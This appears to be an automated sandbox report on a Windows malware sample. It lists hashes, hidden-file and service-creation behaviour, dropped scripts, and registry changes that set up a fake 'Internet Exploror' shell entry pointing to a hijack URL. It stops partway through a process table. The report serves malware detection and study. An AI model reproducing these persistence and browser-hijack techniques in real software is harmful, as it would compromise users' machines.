Analysis
-
max time kernel
147s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/11/2024, 08:38
Static task
static1
Behavioral task
behavioral1
Sample
8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
-
Size
444KB
-
MD5
8a903fdc2c88d4b47405519f174877cd
-
SHA1
e9d2e4265d7c9623cb5b5c309cac128eaac78297
-
SHA256
585096007cf202b245bd6b1e891142e4d2603addbd09e23b2fec98487ccd7fcd
-
SHA512
75f558c37595039c36920c1b35a5581bfea3a55553680d1a8b79449405b33edf06a4a522465de6baa982c24045712c1744cfbc057ea86ba811452cc647190ea3
-
SSDEEP
12288:wutrzh9xOXk7GMHOJxl/0z+uoqzBTQGtem:wutr5OUStD/0zpJ7
Malware Config
Signatures
-
Creates new service(s) 2 TTPs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4948 attrib.exe 1888 attrib.exe 1380 attrib.exe 4792 attrib.exe 672 attrib.exe 3696 attrib.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation msn.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 396 msn.exe 1984 Gaicia.exe 3672 Gaicia.exe -
Drops file in Program Files directory 21 IoCs
description ioc Process File opened for modification C:\Program Files\WinWare\360.cmd cmd.exe File created C:\Program Files\WinWare\361.cmd cmd.exe File opened for modification C:\Program Files\WinWare\361.cmd cmd.exe File opened for modification C:\Program Files\WinWare\Internet Exploror.lnk cmd.exe File opened for modification C:\Program Files\WinWare\winare.vbs cmd.exe File created C:\Program Files\WinWare\360.cmd cmd.exe File created C:\Program Files\WinWare\Internet Exploror.lnk cmd.exe File created C:\Program Files\WinWare\360SE.vbs cmd.exe File opened for modification C:\Program Files\WinWare\360SE.vbs cmd.exe File created C:\Program Files\WinWare\36OSE.vbs cmd.exe File opened for modification C:\Program Files\WinWare\36OSE.vbs cmd.exe File opened for modification C:\Program Files\WinWare\tool.cmd attrib.exe File created C:\Program Files\Windows\360SE.vbs cmd.exe File created C:\Program Files\WinWare\winare.vbs cmd.exe File opened for modification C:\Program Files\WinWare\tool.cmd cmd.exe File opened for modification C:\Program Files\Windows\36OSE.vbs cmd.exe File opened for modification C:\Program Files\Windows\360SE.vbs cmd.exe File created C:\Program Files\Windows\36OSE.vbs cmd.exe File opened for modification C:\Program Files\WinWare\360.cmd attrib.exe File created C:\Program Files\WinWare\tool.cmd cmd.exe File opened for modification C:\Program Files\WinWare\361.cmd attrib.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Mail\UltraEdit\is.cmd cmd.exe File opened for modification C:\Windows\Mail\UltraEdit\is.cmd cmd.exe File created C:\Windows\Mail\UltraEdit\winare.vbs cmd.exe File opened for modification C:\Windows\Mail\UltraEdit\winare.vbs cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3584 sc.exe 3692 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Service Discovery 1 TTPs 3 IoCs
Adversaries may try to gather information about registered local system services.
pid Process 3584 sc.exe 3216 net.exe 1508 net1.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3573156976" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 805f97d5cb2ddb01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{0073E4C4-99BF-11EF-9361-DA67B56E6C1B} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 701a9cd5cb2ddb01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ab44cbc7ac5e824ba8748f8001f100a1000000000200000000001066000000010000200000001bd76d8427eb09eda2e3e147e3c6b3ed6f027e37ef29afba965e14d07357a4f5000000000e8000000002000020000000b7339b69ac3c3859a00e3bc1f5fdb0f46b804976e35320c44c36e73d42e2524720000000a5a6543e5f86d4638a3b9bed99a003310781fafdf70ca4c75d516f5ae9e086a140000000c6ea66e90d760528585e6747c610b5214cf80a93ed42dd5320207ed01436cdca9dbed98b0525057e9bc7a3118f9d6fe00cc0187d8453cd9f59cb473d3d238ee2 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3570969437" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31141323" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437388084" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31141323" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ab44cbc7ac5e824ba8748f8001f100a100000000020000000000106600000001000020000000a8d3f9ef91da089972a9cb26db5b2445905ee8751fb06a65e35b5778b72343a2000000000e8000000002000020000000f0a9498830bfb5c37da4beee450e8b376f90174df219bca1bb147c2f460f8e682000000063981dbd0ce2420c13a03d91a37f78010c4fa4143ab709e3c3c2d11da03e9afb400000004cdd877cf45ffc66360df437418f415a09154368c8e41cb47dee151c5802428a4288f804313c38130dbf1ea02f8cd622fe726e96dc7faf44fc793cfc1e442a53 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3570969437" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31141323" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe -
Modifies registry class 45 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ reg.exe -
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 968 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 968 iexplore.exe 968 iexplore.exe 4448 IEXPLORE.EXE 4448 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2988 wrote to memory of 4912 2988 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe 84 PID 2988 wrote to memory of 4912 2988 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe 84 PID 2988 wrote to memory of 4912 2988 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe 84 PID 4912 wrote to memory of 4312 4912 WScript.exe 86 PID 4912 wrote to memory of 4312 4912 WScript.exe 86 PID 4912 wrote to memory of 4312 4912 WScript.exe 86 PID 4312 wrote to memory of 968 4312 cmd.exe 88 PID 4312 wrote to memory of 968 4312 cmd.exe 88 PID 4912 wrote to memory of 3232 4912 WScript.exe 91 PID 4912 wrote to memory of 3232 4912 WScript.exe 91 PID 4912 wrote to memory of 3232 4912 WScript.exe 91 PID 3232 wrote to memory of 1068 3232 cmd.exe 93 PID 3232 wrote to memory of 1068 3232 cmd.exe 93 PID 3232 wrote to memory of 1068 3232 cmd.exe 93 PID 3232 wrote to memory of 4684 3232 cmd.exe 95 PID 3232 wrote to memory of 4684 3232 cmd.exe 95 PID 3232 wrote to memory of 4684 3232 cmd.exe 95 PID 968 wrote to memory of 4448 968 iexplore.exe 94 PID 968 wrote to memory of 4448 968 iexplore.exe 94 PID 968 wrote to memory of 4448 968 iexplore.exe 94 PID 3232 wrote to memory of 1348 3232 cmd.exe 96 PID 3232 wrote to memory of 1348 3232 cmd.exe 96 PID 3232 wrote to memory of 1348 3232 cmd.exe 96 PID 3232 wrote to memory of 1888 3232 cmd.exe 97 PID 3232 wrote to memory of 1888 3232 cmd.exe 97 PID 3232 wrote to memory of 1888 3232 cmd.exe 97 PID 3232 wrote to memory of 3512 3232 cmd.exe 98 PID 3232 wrote to memory of 3512 3232 cmd.exe 98 PID 3232 wrote to memory of 3512 3232 cmd.exe 98 PID 3232 wrote to memory of 3476 3232 cmd.exe 99 PID 3232 wrote to memory of 3476 3232 cmd.exe 99 PID 3232 wrote to memory of 3476 3232 cmd.exe 99 PID 3232 wrote to memory of 4828 3232 cmd.exe 100 PID 3232 wrote to memory of 4828 3232 cmd.exe 100 PID 3232 wrote to memory of 4828 3232 cmd.exe 100 PID 3232 wrote to memory of 448 3232 cmd.exe 101 PID 3232 wrote to memory of 448 3232 cmd.exe 101 PID 3232 wrote to memory of 448 3232 cmd.exe 101 PID 3232 wrote to memory of 884 3232 cmd.exe 102 PID 3232 wrote to memory of 884 3232 cmd.exe 102 PID 3232 wrote to memory of 884 3232 cmd.exe 102 PID 3232 wrote to memory of 4588 3232 cmd.exe 103 PID 3232 wrote to memory of 4588 3232 cmd.exe 103 PID 3232 wrote to memory of 4588 3232 cmd.exe 103 PID 3232 wrote to memory of 4072 3232 cmd.exe 161 PID 3232 wrote to memory of 4072 3232 cmd.exe 161 PID 3232 wrote to memory of 4072 3232 cmd.exe 161 PID 3232 wrote to memory of 3676 3232 cmd.exe 105 PID 3232 wrote to memory of 3676 